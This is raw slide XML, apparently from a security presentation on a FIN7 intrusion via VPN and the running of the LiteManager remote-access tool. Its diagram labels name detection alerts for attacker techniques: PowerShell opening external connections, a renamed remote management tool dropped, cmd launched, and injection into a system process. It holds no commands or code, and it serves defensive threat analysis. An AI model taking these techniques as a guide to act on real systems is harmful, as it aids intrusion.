          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="11750644" y="6026290"/>
            <a:ext cx="1550754" cy="464622"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100031"/>
            </a:avLst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Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19569E45-1ADA-E48D-19F9-60E489030F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10618086" y="3040934"/>
            <a:ext cx="617551" cy="343103"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57494851-9BDF-DF16-4FC0-ED0D53CC7A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12857105" y="5640503"/>
            <a:ext cx="3678240" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> creates an external </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>network connection (A0502b)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Rectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16FE0BA1-0DC9-763D-C054-D2F969E786B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13499268" y="8662086"/>
            <a:ext cx="4162270" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Renamed remote Monitoring &amp; Management </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Tool Dropped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1885AA-5BAC-3598-A4E0-36B77BED977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9369453" y="666729"/>
            <a:ext cx="18114681" cy="816936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516C2E2-A091-4716-8B4E-50D4A2861EBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10556171" y="2436381"/>
            <a:ext cx="2009738" cy="468180"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="2009738" cy="468180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B402481E-D9EE-97FF-181E-252D2AFF15D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="2009737" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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12" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A64BCF08-A43A-2AD3-153B-DAE2CF3F5360}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12379151" y="1139122"/>
              <a:ext cx="1866132" cy="431225"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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services.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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</p:grp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FD600784-5065-FDFD-8F22-D6659756866F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9960237" y="2074536"/>
            <a:ext cx="610295" cy="581574"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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74BB03C-2827-BE63-3E25-33E6AB66CE42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11506865" y="3939904"/>
            <a:ext cx="3145521" cy="834390"/>
            <a:chOff x="12600384" y="914400"/>
            <a:chExt cx="3145521" cy="834390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F9615373-21A9-AFA1-8509-579B60F823B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12600384" y="1103018"/>
              <a:ext cx="2849512" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="424D5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F34FB7A-A7CF-985E-B289-DEC8F9DB6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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12766356" y="1162059"/>
              <a:ext cx="549560" cy="335445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{422CCB9C-794B-D799-142B-766BFBB954BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="2404204" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(12496)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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98738BA0-D2ED-6B11-5624-E87F7E3099DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="11072582" y="3928329"/>
            <a:ext cx="567054" cy="301512"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E56E62-9E51-CA31-DBA3-81B0D70D3EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13499268" y="7433921"/>
            <a:ext cx="4162270" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Suspicius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> script interpreter started – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (F0447d)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E888D05-36EE-EC2A-213B-E4570380A55C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11991578" y="4979133"/>
            <a:ext cx="3841620" cy="483282"/>
            <a:chOff x="11839730" y="3389691"/>
            <a:chExt cx="3841620" cy="483282"/>
          </a:xfrm>
        </p:grpSpPr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5B49B03F-C852-ABFF-255F-EEBB7F2B9190}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11839730" y="3390371"/>
              <a:ext cx="3663949" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA30EC0-B089-D6B7-A01C-454B9D8BCA26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12438063" y="3389691"/>
              <a:ext cx="3243287" cy="483282"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0" err="1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powershell.exe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" kern="0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(16656)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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E8F4C2E7-A2A2-477E-C124-A91D121B1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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11974098" y="3482196"/>
              <a:ext cx="347807" cy="260855"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="85" name="Elbow Connector 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7675C727-104F-2FAC-E50A-5CCA8A6CB4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="11543710" y="4755363"/>
            <a:ext cx="567054" cy="301512"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="424D5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ectangle: Rounded Corners 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69211D00-ABFC-DF05-1A99-587A64A368DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12868535" y="6143375"/>
            <a:ext cx="3678240" cy="467642"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="rnd">
            <a:noFill/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="63500">
              <a:schemeClr val="accent4">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="D80B55"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1371600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Injection into system process (F0413a)(C)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="Graphic 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E36FDD5-3575-6723-597F-C2CD897237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3215690" y="8651045"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Graphic 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69BFDD4D-6442-72D9-3ED7-C88D400261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2550672" y="6226500"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Graphic 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6401595D-1B63-FA3C-E6C1-D557D30CD8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2550672" y="5686173"/>
            <a:ext cx="300198" cy="300198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="109" name="Group 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B806C796-9623-7613-39E7-D1A48BF78AF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="18549280" y="682235"/>
            <a:ext cx="13173753" cy="8834870"/>
            <a:chOff x="5585301" y="682235"/>
            <a:chExt cx="13173753" cy="8834870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Rounded Rectangle 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286678F8-5A36-C9D2-42D0-84A0A8CEA7F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5585301" y="682235"/>
              <a:ext cx="13173753" cy="8834870"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 282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BE47B774-BFD4-EC46-BDB1-90BC31566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984765" y="1224410"/>
              <a:ext cx="12013626" cy="7881731"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F02B07F-F7FB-16D3-DA9C-DD01907D493A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114345" y="825334"/>
            <a:ext cx="5190450" cy="994190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="60963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33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05758">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="8023" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8023" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>PN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="8023" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>– FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8023" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0096A1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332333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81E092-CCF2-2FCF-05CD-656D9E775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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1C0239-E221-041E-1567-73E84A0B040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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A499136C-799C-2265-7BAC-B55D9EC0F64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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A8E902-F8AB-30F9-3D13-EBA51561EB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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88CA05C2-B4EE-E10A-652A-EA8639694E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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AD4A04D-8898-D269-9630-58018D112BEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059077" y="851318"/>
            <a:ext cx="7495342" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>LiteManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>futtatása</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold"/>
            </a:endParaRPr>
          </a:p>
